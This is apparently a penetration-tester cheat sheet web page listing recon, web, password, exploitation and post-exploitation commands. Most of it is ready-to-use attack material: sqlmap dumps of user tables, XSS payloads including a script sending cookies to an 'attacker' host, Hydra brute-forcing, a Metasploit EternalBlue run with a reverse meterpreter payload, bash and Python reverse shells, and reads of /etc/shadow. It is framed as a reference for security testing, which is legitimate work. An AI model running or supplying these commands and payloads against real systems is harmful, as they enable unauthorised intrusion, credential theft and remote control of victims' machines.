HxHippy

Pentester Cheat Sheet

Reconnaissance, exploitation, and security testing.

Last updated: 2025-01-15

Pentester Cheat Sheet

Reconnaissance, exploitation, and security testing quick reference.

Quick Reference

# Quick recon
nmap -sV -sC -oA initial_scan target

# Web enumeration
gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt

# Check for SQLi
sqlmap -u "http://target/page?id=1" --batch

Reconnaissance

Passive Recon

# DNS enumeration
dig target.com ANY
dig target.com MX
dig target.com NS
host -t ns target.com

# WHOIS
whois target.com

# Subdomain discovery
subfinder -d target.com
amass enum -d target.com

# Certificate transparency
curl "https://crt.sh/?q=%.target.com&output=json" | jq .

Active Recon

# Port scan
nmap -sV -sC target
nmap -p- -T4 target
nmap -sU --top-ports 100 target

# Service version
nmap -sV --version-intensity 5 target

# OS detection
nmap -O target

# Vuln scan
nmap --script vuln target

Web Application

Directory/File Enumeration

# Gobuster
gobuster dir -u http://target -w wordlist.txt -x php,txt,html

# Feroxbuster
feroxbuster -u http://target -w wordlist.txt

# ffuf
ffuf -u http://target/FUZZ -w wordlist.txt

SQLi Testing

# SQLMap
sqlmap -u "http://target/page?id=1" --dbs
sqlmap -u "http://target/page?id=1" -D database --tables
sqlmap -u "http://target/page?id=1" -D database -T users --dump

# POST request
sqlmap -u "http://target/login" --data="user=admin&pass=test" --dbs

# Cookie-based
sqlmap -u "http://target/" --cookie="session=abc123" --dbs

XSS Testing

// Basic payloads
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>

// Cookie stealing
<script>document.location='http://attacker/steal?c='+document.cookie</script>

Password Attacks

Brute Force

# Hydra - SSH
hydra -l admin -P passwords.txt target ssh

# Hydra - HTTP POST
hydra -l admin -P passwords.txt target http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid"

# John the Ripper
john --wordlist=rockyou.txt hashes.txt
john --show hashes.txt

# Hashcat
hashcat -m 0 hashes.txt rockyou.txt  # MD5
hashcat -m 1000 hashes.txt rockyou.txt  # NTLM

Hash Identification

# Identify hash type
hash-identifier
hashid hash.txt

# Common formats
# MD5: 32 hex chars
# SHA1: 40 hex chars
# SHA256: 64 hex chars
# NTLM: 32 hex chars

Exploitation

Metasploit

# Start
msfconsole

# Search
search eternalblue
search type:exploit platform:windows

# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST attacker_ip
exploit

Shells

# Reverse shell (bash)
bash -i >& /dev/tcp/attacker/4444 0>&1

# Reverse shell (python)
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]);'

# Listener
nc -lvnp 4444

# Upgrade shell
python -c 'import pty; pty.spawn("/bin/bash")'

Post Exploitation

# Linux
whoami && id
cat /etc/passwd
cat /etc/shadow
find / -perm -4000 2>/dev/null  # SUID
sudo -l

# Windows
whoami /priv
net user
net localgroup administrators

Reporting Template

## Finding: [Vulnerability Name]

**Severity:** Critical/High/Medium/Low
**CVSS Score:** X.X

### Description
Brief description of the vulnerability.

### Impact
What an attacker could do.

### Proof of Concept
Steps to reproduce with evidence.

### Remediation
How to fix the issue.
advanced Security Roles Updated 2025-01-15
  • pentesting
  • penetration testing
  • exploitation
  • recon
  • security testing